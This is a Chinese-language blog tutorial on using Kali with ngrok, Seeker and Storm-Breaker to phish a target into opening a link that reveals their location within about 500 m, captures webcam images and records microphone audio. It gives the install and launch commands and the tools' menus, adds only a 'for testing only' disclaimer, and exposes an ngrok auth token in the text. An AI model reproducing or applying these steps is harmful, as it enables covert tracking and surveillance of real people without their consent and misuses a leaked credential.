首页 > 其他分享 >Kali 获取任意设备信息

Kali 获取任意设备信息

时间:2023-09-15 15:46:01浏览次数:32  
标签:Kali image sudo 获取 seeker https 任意 ngrok

注意:仅供测试 请勿商用

  • 可获取对方位置 误差小于500m
  • 访问摄像头
  • 访问麦克风

一. 安装环境

#01 mac 安装虚拟机
下载地址:https://www.macyy.cn/archives/1836


#02 安装 kali 镜像
https://www.kali.org/

root 123456

二. 开始使用

2.1 安装ngrok

#05 安装ngrok
https://ngrok.com/download

 curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok


注册获取令牌
ngrok authtoken   2VNmnrdzSZpht6cDdCRRMMB5rDd_3xUX2WpRZvjxDHAD3oXQL


2.2 安装seeker

#01 安装 seeker.git
cd /root/tools/seeker
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh

#02 启动
python3 seeker.py
 
或者
python3 seeker.py -p 1337    #这里 -p 指定端口
 
 



  • ngrok 生成链接

![image-20230915140949289](/Users/ningcaichen/Library/Application Support/typora-user-images/image-20230915140949289.png)

  • 获取地址位置

![image-20230915140919995](/Users/ningcaichen/Library/Application Support/typora-user-images/image-20230915140919995.png)

三. Storm-Breaker

3.1 启动服务

#01 Storm-Breaker 地址
https://github.com/ultrasecurity/Storm-Breaker

#02 开始安装
$ git clone https://github.com/ultrasecurity/Storm-Breaker
$ cd Storm-Breaker
$ sudo bash install.sh
$ sudo python3 -m pip install -r requirements.txt
$ sudo python3 st.py


#03 菜单栏
                                                                                                    
 [0] Get Normal Data [Without Any Permissions]    #获取正常数据[无任何权限]                                                  
                                                                                                    
 [1] Get Location [SMARTPHONES]    #获取位置[SMARPHONES]                                                                 
                                                                                                    
 [2] Access Webcam       #访问网络摄像头                                                                           
                                                                                                    
 [3] Access Microphone    #接入麦克风                                                                       
                                                                                                    
 [4] Exit . . .  
 

3.2 获取摄像头

$ sudo python3 st.py


#03 菜单栏
                                                                                                    
 [0] Get Normal Data [Without Any Permissions]    #获取正常数据[无任何权限]                                                  
                                                                                                    
 [1] Get Location [SMARTPHONES]    #获取位置[SMARPHONES]                                                                 
                                                                                                    
 [2] Access Webcam       #访问网络摄像头                                                                           
                                                                                                    
 [3] Access Microphone    #接入麦克风                                                                       
                                                                                                    
 [4] Exit . . .  
 

输入2即可

![image-20230915150044617](Kali .assets/image-20230915150044617.png)

  • 图片位置
  • 敏感数据不展示

![image-20230915150907595](Kali .assets/image-20230915150907595.png)

3.3 获取麦克风

$ sudo python3 st.py


#03 菜单栏
                                                                                                    
 [0] Get Normal Data [Without Any Permissions]    #获取正常数据[无任何权限]                                                  
                                                                                                    
 [1] Get Location [SMARTPHONES]    #获取位置[SMARPHONES]                                                                 
                                                                                                    
 [2] Access Webcam       #访问网络摄像头                                                                           
                                                                                                    
 [3] Access Microphone    #接入麦克风                                                                       
                                                                                                    
 [4] Exit . . .  


选择3 默认存储在 sounds


![image-20230915151714769](Kali .assets/image-20230915151714769.png)

标签:Kali,image,sudo,获取,seeker,https,任意,ngrok
From: https://www.cnblogs.com/saas-open/p/17705133.html

相关文章

  • Dynamic CRM调用WCF接口获取选项集的说明数据
    一、SQL语句:selectValueId,LabelName fromLocalizedLabelaleftjoinAttributePicklistValuebona.ObjectId=b.AttributePicklistValueIdleftjoinOptionSetconb.OptionSetId=c.OptionSetIdwherea.ComponentState=0andb.ComponentState=0a......
  • 封装一个用来获取多层数组对象的最后一层对象集合
    //获取多层数组对象的最后一层的对象functiongetAllIds(tree:any,result:any){//遍历树获取id数组for(constiintree){if(tree[i].id)result.push(tree[i]);//遍历项目满足条件后的操作if(tree[i].children){//存在子节点就递归ge......
  • jquery获取选择框值
    $(‘input:[type=”checkbox”]:checked’)$(‘[name=”isColsePurchaseLook”]’).eq(1).attr(‘checked’,true);$(‘#isHandinMargin’).attr(‘checked’,true);$(‘#isPlantformChoose’).attr(‘checked’,false);$(this).is(“:checked”)$(“#isPlantformPay”).att......
  • 以太网-在同一个LAN内,主机是如何获取到目的主机的MAC地址的?ARP协议解析
    按照通讯的层级划分来说,无论设备是2层设备如交换机,3层设备如路由器,7层设备如主机,防火墙等等,所有的通讯最终都是基于2层来实现。所以获取目的主机的MAC地址是通讯的前提,获取了MAC地址才可以进行帧的封装。那么一个目标主机有几种方式可以获取到目的主机的MAC地址呢?1.ARP缓存:如......
  • 宏景HCM 任意文件上传漏洞复现
    漏洞概述宏景HCMOfficeServer.jsp接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。漏洞复现鹰图指纹:app.name="宏景HCM"fofa语法:app="HJSOFT-HCM"登录页面如下:POC:POST/w_selfservice/oauthservlet/%2e./.%2e/syst......
  • 记一次获取图图影视中电影的过程
    pc成了办公室里的专用设备,家里只有手机了。所有的操作只能通过手机完成。得了一个新APP,可以免费看电影。 搜索到一个长安三万里,打开一看,内容并不是,不过内容也挺好看。 发现能下载,仔细一看,是能缓存。就是有网缓存,没网离线看。并不是真正意义上的下载成mp4文件到处可以带走......
  • 微信小程序获取深度合成类目资质
    各大应用商店和微信小程序平台对于应用了「应用含深度合成或生成式人工智能服务」的应用都有这比较严格的资质要求,其中最核心的2点要求如下:技术主体的《互联网信息服务算法备案》(算法类型为“生成合成类(深度合成)”)或《互联网信息服务算法备案》(算法类型为“生成合成类”)在审批中......
  • oracle获取xml节点数据
    1.新增获取节点函数CREATEORREPLACEFUNCTIONget_xml_nodeValue(xmlStrCLOB,nodeNameVARCHAR2)RETURNVARCHAR2ISxmlParxmlparser.Parser:=xmlparser.newParser;xDocxmldom.DOMDocument;lenItme......
  • 软件测评中心测试项目及测试过程简析,CMA、CNAS软件测试报告获取
    软件测试是产品周期中必不可少的一步,可以更好的保障软件质量,那么我们所知的软件测评中心一般有哪些测试项目以及测试流程是如何?和小编一起往下看看吧!一、软件测评中心的测试项目1、功能测试:通过模拟用户使用场景,测试软件的各项功能是否正常、稳定。2、性能测试:通......
  • js:上传图片,通过file对象或blob对象获取用于显示的url,获取图片的base64编码;限制文件类
    1//URL.createObjectUrl(file):同步执行;创建一个指向file/blob对象的url,可用于元素的src/href属性23//fileReader.readAsDataURL():异步执行;读取file/blob对象的内容,result属性将返回一个包含data:URL格式的base64字符串45//fileReader.readAsDataURL()是异步的,所......